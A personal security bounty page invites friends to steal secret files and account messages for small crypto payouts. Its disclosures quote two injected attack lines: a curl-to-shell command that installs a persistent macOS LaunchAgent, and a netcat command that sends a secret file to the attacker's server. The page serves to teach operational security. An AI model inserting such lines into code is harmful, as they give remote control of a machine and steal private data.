Please hack me.

I encourage you to gain unauthorized access to my computer or accounts.
If you do, I'm offering a treasure hunt price in bitcoin.

Inspired by an initial idea by my friend @dionyziz.

Bounties

Try to steal these:

The e-mail with the subject Bounty Secret #1 from my Gmail.
฿ 0.02
The Facebook note called Bounty Secret #1 from my Facebook.
฿ 0.02
The direct message from me to myself on my Twitter.
฿ 0.02
The secret file ~/.bounty from my personal MacBook.
฿ 0.04

No physical violence!

Beating me up or threatening with physical violence is not fair game. Blackmailing or physically stealing my laptop or computer from my hands while I'm using it is also not allowed.

No break-ins!

I have not secured my home against physical break-ins.
Don't break into my house for these bounties. It's okay if I let you in.

My phone and laptop computer are logged in to Facebook, Twitter, and Gmail. If you manage to find them unlocked, you'll be able to retrieve these.

The point of the game is to educate people on security. If you find a vulnerability, but are unable to fully exploit it, please let me know. You may be able to receive a partial bounty without retrieving the hidden treasures.

Motivation

As an aspiring security professional, I am required to maintain a certain level of paranoia and best operational security practices when it comes to my accounts and systems. In order to have a rigorous threat model, my security must be associated with a monetary value. Putting a bounty on it gives me a certain amount of confidence that my security has a certain financial lower bound.

Why I need this

I work on cryptography and other security tools which require high level of security. Access to my computers or accounts could negatively affect the people using my tools.

I am also associated with the bitcoin and infosec community and I work on open source projects all the time. Access to my computers or accounts by malicious parties could negatively affect my open source projects. People rely on my GPG signatures on my commit access to make sure they are secure. If my signatures are to be treated as trustworthy, I need to have some confidence that my systems are secure.

Hall of fame

Apostolos (aka @0xCoto) March 12th, 2017

Outcome

Attack failed.

Full disclosure

Recently, my friend @xdavidhu and I released a new infosec tool called KickThemOut, writen in python, which basically ARP-Spoofs people off a network (for bandwith, joy or anything else). Coto claimed that he had installed KickThemOut on his machine but explained that he got an error with urllib2 when attempting to run it. I found it a little stange considering that there hadn't been any issues about the library on the git repo (except of one which had to do with the person's python config and was resolved). That week, I had no time to look into the issue and since it was only affecting one person, I neglected it.

Sometime later, Coto sent me a message declaring that he'd found the bug causing the error. Subsequently, he told me that he'd forked KickThemOut and made some fixes which resolved the issue. He then asked me if I could test it to see whether it runs smoothly on my own machine. That's when I started thinking that there was something suspicious going on. I decided that I should clone the forked repo and inspect it for malicious contents.

After running a diff command to compare my python code with Coto's code, I noticed something very suspicious.
He had injected the following line of code into the main .py file:

os.system('curl [LINK] | sh')

The URL redirected to a file which contained the code:

echo downloading com.zerowidth.launched.appleupdate.plist...
mkdir -p ~/Library/LaunchAgents
curl -o ~/Library/LaunchAgents/com.zerowidth.launched.appleupdate.plist http://launched.zerowidth.com/plists/a0cccd80-e8eb-0134-c60f-0bdaa36c6e38.xml
echo installing com.zerowidth.launched.appleupdate.plist...
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.appleupdate.plist

In brief, if I had chosen to run the python file, a curl command would have transfered the malicious file containing the precedent lines of code into my MacBook Pro and run them in the form of a bash script. The script would have injected a new plist file, giving Coto full access to my machine every time I turned it on (on startup), using the RunAtLoad plist command.

Security correction

I should be very careful and diligent about running untrusted software. When I do decide to run untrusted code, I should do so in a virtual machine (in a VM). If it's impossible to run within a VM, I should not run it at all. Additionally, I could have also asked to use Google Hangouts for screensharing, or insisted on installing Teamviewer.

When it comes to policy, I will be more insisting and less polite, regardless of what my friends tell me, and I will not break policy for convenience reasons.

David (aka @xdavidhu) August 14th, 2017

Outcome

Attack failed.

Full disclosure

While David and I were fixing some bugs in KickThemOut, David claimed that he added a new feature and that he wanted me to test it out. He asked me to try running his new develop branch commit. Subsequently, I git pulled and ran the tool as instructed.

Huge mistake.

David had injected the following line of code into the main .py file:

os.system("cat /Users/k4m4/.bounty | nc [DAVID'S_SERVER_IP] 5463")

Basically, this line of python code sends the contents of the bounty file in that path /Users/k4m4/.bounty to David's server. David had a netcat listener running on his server, awaiting for any incoming requests on port 5463.

Luckily, David assumed that my main username is k4m4; however, it isn't. As a result, once I ran the script using sudo python.py kickthemout.py, all I got was an error message that looked something like this:

cat: /Users/k4m4/.bounty: No such file or directory

Since KickThemOut requires root to run, if David had used the correct path, he would have successfully received all contents of my bounty file.

Security correction

I should always look at the changes that have been made in each commit before pulling and running any piece of code from GitHub or anywhere else. Even if you skim through the code, a short command, such as the one that David injected, can easily go unnoticed.

  1. One pay-out per day.
  2. One pay-out per vulnerability.
  3. Full disclosure required.
  4. No leaving known attack vectors behind after the attack.

Also don't violate my privacy, steal my bitcoins or make GPG signatures in my name. Follow common sense.

Why this makes me more secure

Typical theoretical treatments of operational security remain problematically unpragmatic even when performed by experienced professionals. As you will see in the list of successful past attacks, even though I am somewhat aware of my security, often the cheapest and easiest ways of attacking are unexpected and I tend to be worrying about more advanced problems when I am vulnerable to the simplest possible attacks.

By encouraging white-hat friends and colleagues to attack me and disclose their methods, I am protecting myself against malicious attackers who could attempt targeted concealed and persistent attacks. White-hats and black-hats use similar methodologies. If the bounty is collected, I improve my defences and certain methods are no longer applicable.

My policies

I do not base my security on obscurity. Therefore, I am disclosing my basic policies here so that I can help potential adversaries who are treasure hunting. While I try not to, I may deviate from these policies under social engineering pressure, so even though I may think I am secure, it may be worth a shot. Some of my policies are outlined in the Hall of Fame above.

Other friends with bounties

Several friends are also following this bounty game, as they also feel it helps them improve their opsec practices. Their bounties are listed below. Their rules of engagement are similar to those above. If you have a bounty on your machine, let me know and I will add you to this list.

Dionysis Zindros

Target

Steal the ~/.bounty file on his Macbook Pro.

Payout

฿ 0.08

Target

Post the message "Bounty claimed by @YourName" on his Facebook.

Payout

฿ 0.04

Target

Post the message "Bounty claimed by @YourName" on his Twitter.

Payout

฿ 0.04

George Filippas

Target

Steal the ~/.bounty file on his linux laptop.

Payout

10 EUR

Target

Access his Facebook.
Access his Gmail.

Payout

5 EUR

Petros Angelatos

Target

Steal the ~/.bounty file on his linux laptop.

Payout

฿ 0.5

Dimitris Karakostas

Target

Steal the ~/.bounty file on his linux laptop.

Payout

50 EUR

Dimitris Lamprinos

Target

Steal the ~/.bounty file on his Linux laptop.

Payout

5 EUR

George Kastrinis

Target

Steal the ~/.bounty file on his Linux laptop.
Steal the E:\bounty file on his Windows 10 desktop.
Steal the email with subject "Bounty secret" from his gmail.
Access his Facebook.
Access his Gmail.

Payout

5 EUR